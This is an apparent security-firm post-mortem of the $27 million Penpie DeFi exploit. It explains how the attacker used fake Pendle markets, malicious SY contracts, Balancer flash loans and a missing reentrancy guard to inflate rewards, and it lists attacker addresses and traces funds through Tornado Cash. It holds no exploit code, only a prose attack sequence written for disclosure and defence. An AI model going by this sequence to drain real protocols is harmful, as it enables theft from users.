# The Penpie Heist On September 3rd, 2024,[ **Penpie**](https://www.pendle.magpiexyz.io/stake), a yield farming protocol built on the [**Pendle Finance**](https://www.pendle.finance/) ecosystem, suffered a major exploit that led to the loss of approximately **$27 million** in crypto assets. The attacker exploited vulnerabilities in Penpie by introducing a fake market on Pendle Finance, using malicious contracts disguised as SY (Standardized Yield) Tokens, which were linked to Pendle Liquidity Provider Tokens (LPT). This manipulation enabled the attacker to artificially inflate rewards, which were subsequently redeemed for various assets, including **staked ETH (stETH)**, **agETH**, **rswETH**, **sUSDE**, and **gUSDC**. ## **Penpie’s Role in Pendle Finance** Penpie plays a pivotal role within the **Pendle Finance ecosystem** by offering yield optimization and boosting services using **veTokenomics (Voting Escrow Tokenomics)**. Through Penpie, users can lock **PENDLE tokens**, gain governance rights, and maximize both their rewards and governance participation. These functionalities are critical in enhancing the overall utility and growth of Pendle Finance. ## **Attack Overview and Initial Response** Following the exploit, both **Penpie** and **Pendle Finance** promptly halted their operations to limit further damage. Despite these measures, the exploit significantly impacted the tokens associated with both protocols. **Penpie’s native token (PNP)** saw a dramatic **40% drop** in value, while **PENDLE** itself experienced a **9% decline**. This rapid devaluation highlights the far-reaching consequences of security vulnerabilities in decentralized finance (DeFi) ecosystems. **SY** - Standardized Yield Tokens are the contracts to wrap any yield bearing tokens. **PT**- Principal Tokens represents the principal amount in the future date **YT**- Yield Tokens represents future yield **LPT**- Liquidity provide Tokens are a certificate of providing liquidity in the protocol **PRT**- Pool Reward Toekns are a certificate you get after depositing LPT into Penpie Pool ### **Addresses and Transactions** * **Main Attacker Address**: 0x7a2f4d625fb21f5e51562ce8dc2e722e12a61d1b * **Malicious SY Contracts:** 1. 0x4af4c234b8cb6e060797e87afb724cfb1d320bb7 2. 0x4476b6ca46b28182944ed750e74e2bb1752f87ae 3. 0xcde2cd6aeaaf0238f4ce33295be13704e4a97de2 4. 0x4BC9815b859c8172CEe1ab2CD372fD0Eb00eb487 **• Key Exploit Transactions**: 1. 0x42b2ec27c732100dd9037c76da415e10329ea41598de453bb0c0c9ea7ce0d8e5 (Ethereum) 2. 0x7e7f9548f301d3dd863eac94e6190cb742ab6aa9d7730549ff743bf84cbd21d1 (Ethereum) 3. 0x56e09abb35ff12271fdb38ff8a23e4d4a7396844426a94c4d3af2e8b7a0a2813 (Ethereum) 4. 0x67c5400da117b906f8c0fc5f5149e4ea10ed6358cd9ea2ec0ed8f559d757b7df (Arbitrum) ## Decoding the Exploit The root cause of the exploit was **Penpie’s flawed assumption** that all markets created on Pendle were legitimate. The attacker was able to create three malicious **SY contract** and mint counterfeit tokens, including **PT-stETH 26DEC2024 (Principal Tokens)** and **YT-stETH 26DEC2024 (Yield Tokens)**. By staking these counterfeit tokens, the attacker acquired **Liquidity Provider Tokens (LPT)**, which were then deposited into **Penpie’s pool** to receive **Pool Reward Tokens (PRT)**. The attacker leveraged the **batchHarvestMarketRewards()** function in the **Pendle Staking Contract**. By utilizing **flash loans** from **Balancer** ( A DeFi protocol), particularly involving **sUSDE**, **wstETH**, **agETH** and **rswETH**, they injected significant liquidity into the fake market. This liquidity inflow triggered the **redeemRewards()** function of the malicious SY contract, which temporarily inflated the attacker’s staking balance. As a result, they were able to claim disproportionately large rewards. A key vulnerability that was exploited in this attack was the **absence of a reentrancy guard**. The attacker was able to repeatedly call the reward function within the same transaction, as they were the sole depositor in the fake market. This allowed them to continuously harvest rewards, leading to the unauthorized accumulation of assets. Once the rewards were claimed, the attacker burned the PRT tokens, withdrew all liquidity, and redeemed the rewards. The flash loans were subsequently repaid, and the attacker walked away four times with nearly **$27 Million**. An important thing to mention that this exploit not only happened on Ethereum, but on Arbitrum as well. This attack underscores the critical need for **market validation**, **reentrancy protections**, and **improved reward distribution mechanisms** in DeFi protocols. ## Hack Breakdown and Timeline #### 1. **Creation of Malicious Contracts and Tokens** at 1:41 PM on 3rd Sept, 2024 At 1:41 PM on September 3rd, the attacker created the malicious SY contract. They used it to mint **fake PT and YT tokens** linked to non-existent assets. (*Tx-0xfda0dde38fa4c5b0e13c506782527a039d3a87f93f9208c104ee569a642172cd2*).

Creation of first Malicious Contract

Attack contract as SY contract with PT and YT tokens

#### **2. Creation of Fake Pendle Market at 1:44 PM on 3rd September** By **1:44 PM**, the attacker used the malicious tokens to create a fake market in Penpie’s system. This fake market enabled them to manipulate the liquidity pools. (*Tx-0xfda0dde38fa4c5b0e13c506782527a039d3a87f93f9208c1 04ee569a642172d2*)

Creation of Fake Market

#### **3. First Attack Execution at 2:23 PM on 3rd September** The attacker used **Attacker 2** address (*0xc0eb7e6e2b94aa43bdd0c60e645fe915d5c6eb84*), And used **flash loans** from **Balancer** to inflate liquidity with assets like **wstETH, sUSDE, agETH**, and **rswETH**.

Flash Loan from Balancer

Once having enough liquidity, the attacker manipulated batchHarvestMarketRewards() function which allowed the Attacker to call redeemRewards() function, allowing to harvest rewards multiple times, despite providing no real liquidity.

The Attack

After removing all the liquidity and withdrawing all the rewards, along with returning the flash loans, the exploiter transferred all the funds from the Attack contract to Attacker 1 at 2:27 Pm (*Tx-0x5f348e5d7802bdfcb5e3b7515d8d0a50c6a1067cf2fe6633334abce4bc2ee8f0*).

Transfer of rewards

#### **4. Creation of another Malicious SY Contract at 2:31 PM on 3rd September** The attacker continued to exploit Penpie using a similar strategy by creating new malicious SY contract.

Creation of a new malicious SY Contract

On important thing to mention, all the fake tokens were introduced using **PendleYeildContractFactory** contract and all the Fake markets creation were done by **PendleMarketFactoryV3** contract. The main reason behind creation of fake YT and PT tokens is to get the valuable LP and PRT tokens, as a proof of providing liquidity and inflate the rewards.

YT and PRT tokens

#### **5. The Second Attack at 2:37 PM on 3rd September** Now, the Attacker after getting the PRT and YT tokens, began again by knocking the doors of Balancer Vault and borrowing large amounnts of agETH and rswETH tokens through flash loans.

Second Flash Loan from Balancer

Then again they exploited the batchHarvestMarketRewards() function of the pool and triggering redeemRewards function of the new Fake Market (0x5b6c...), setting the rewards to the new two market tokens, depositing them into the Penpie Pool and triggering multiclaim() function fo the Master Penpie contract being the only depositer.

The Second Attack

This allowed him to withdraw the LPT tokens. Finally, the Attacker burnt the PRT tokens, withdrew all the rewards and liquidity, paid by the flash loans, eventually profitting.

Rewards

#### **6. Creation of Another Malicious SY contract at 2:38 PM on 3rd September** The Attacker executed the same startegy third time in the similar fashion, gaining some more agETH and rswETH.

Third Attack

## Tracing the Funds Using **Blockscope’s Tracer** tool, we identified the paths taken by the attacker to obscure the stolen funds. The image below shows the transfer of funds to the Attacker from various Malicious contracts.

Attacker and Malicious SY contracts

The majority of assets were funneled through **Tornado Cash**, making further tracking difficult. The visualization tool clearly highlights the **Rubic Offset Router** being used to swap rewards and various intermediary addresses that facilitated fund tunneling.

Tunneling of Funds

## Associated Addresses Let's have a look on all the major addresses invloved in this Penpie Exploit. Although we found a lot of addresses and wallets but we would like to mention only the relevant ones, which makes sense. Using our Cohort Analysis, we have tried to visualize all the major wallets and contracts involved int his exploit.

Cohort Analysis

### List of all the Associated Addresses | Identity | Detail | Address | | ------------------------------ | ------------------------------------------------------------ | ------------------------------------------ | | Main Attacker | The main attacker wallet of the the exploit | 0x7a2f4d625fb21f5e51562ce8dc2e722e12a61d1b | | Attacker 2 | Wallet used to transfer funds with first SY contract exploit | 0xc0eb7e6e2b94aa43bdd0c60e645fe915d5c6eb84 | | Attacker 3 | Used for tunneling and off boarding funds | 0x28e3fd9edca8fccb912fe3ab36c78f96cfc74769 | | Attacker 4 | Used for tunneling and off boarding funds | 0x69751b7e52dbbd64281ec9049dfa623c7ecdeb52 | | Attacker 5 | Used for tunneling and off boarding funds | 0x2f2dde668e5426463e05d795f5297db334f61c39 | | Attacker 6 | Used for tunneling and off boarding funds | 0x2dc15e0ff02f39d4d23a96d6ef2595df3d1e18a0 | | Attacker 7 | Used for tunneling and off boarding funds | 0x415a7916c0f52a95f16034d74fb89528c0fc1b11 | | Attacker 8 | Used for tunneling and off boarding funds | 0x8c37ad70ce51e54d2d75da40668e9530d337f26b | | Attacker 9 | Used for tunneling and off boarding funds | 0x688413d6cae1c0e0882e274a98e0b901fdf7233c | | Attacker 10 | Used for tunneling and off boarding funds | 0xf61aa5fdb43ecbb90ff12086045c9432eee3d03e | | Attacker 11 | Used for tunneling and off boarding funds | 0x10f8c81386a2563f687011f4ebc8f2091cb501e8 | | Attacker 12 | Used for tunneling and off boarding funds | 0x37767e2d9131c84441567da5474158b0918b65a4 | | Malicious SY Contract | Contract used in first attack | 0x4af4c234b8cb6e060797e87afb724cfb1d320bb7 | | Malicious SY Contract 2 | Contract used in second attack | 0x4476b6ca46b28182944ed750e74e2bb1752f87ae | | Malicious SY Contract 3 | Contract used in third attack | 0xcde2cd6aeaaf0238f4ce33295be13704e4a97de2 | | Malicious Contract on Arbitrum | Contract used in the attack on Arbitrum | 0x4BC9815b859c8172CEe1ab2CD372fD0Eb00eb487 | ## Notable Obervations **Cross-Chain Exploit**:\ The attack was executed not only on Ethereum but also on **Arbitrum**, where the attacker leveraged flash loans in **gUSDC** and exploited the protocol similarly using another malicious contract (0x4bc9815b859c8172cee1ab2cd372fd0eb00eb487).

Attack on Arbitrum

**Audited Protocols**:\ Despite being audited by [**WatchPug**](https://www.watchpug.org/) and [**Zokyo**](https://zokyo.io/), Penpie and Pendle Finance failed to detect the critical vulnerabilities that enabled this reentrancy attack. This highlights the necessity for ongoing audits and real-time monitoring. **Messages to Attacker**:\ Numerous messages were sent to the attacker post-exploit, including offers of assistance from bounty hunters and others who were attempting to capitalize on the situation.

Message from Victim

Anonymous Message

## Monitoring We’ve activated **Blockscope’s Watchtower** to continuously monitor transactions involving more than 12 addresses linked to the [**$27 Million Penpie Hack**](https://www.blockscope.co/community/watchtowers/670e6e844de553085e827486). Our public watchtower provides real-time surveillance, ensuring no suspicious movement goes unnoticed as we work to track and analyze the attacker's activities. ## Conclusion The **$27 million Penpie exploit** serves as a reminder of the vulnerabilities that persist in the DeFi ecosystem, despite audits and security checks. Strengthening market validation processes and implementing better safeguards like **reentrancy guards** and real-time monitoring systems are essential to prevent such devastating attacks in the future. **Investigation by:** [**Tushar Tiwari**](https://in.linkedin.com/in/tushar-tiwari-1380271b7)**, Analyst @** [**Blockscope**](https://www.blockscope.co/)
**Disclaimer: Best Effort Investigation** This investigation and its findings represent our best effort based on the information available at the time. However, please be aware of the following limitations: * The data used in this investigation may contain inaccuracies, omissions, or errors. * Information sources may be incomplete or subject to change. * New evidence may emerge that could alter the conclusions. * Analysis and interpretations are based on current understanding and may evolve. We have made every reasonable attempt to ensure accuracy, but cannot guarantee that all information is entirely correct or complete. This report should be considered a snapshot of our current knowledge and understanding, subject to revision as new information becomes available.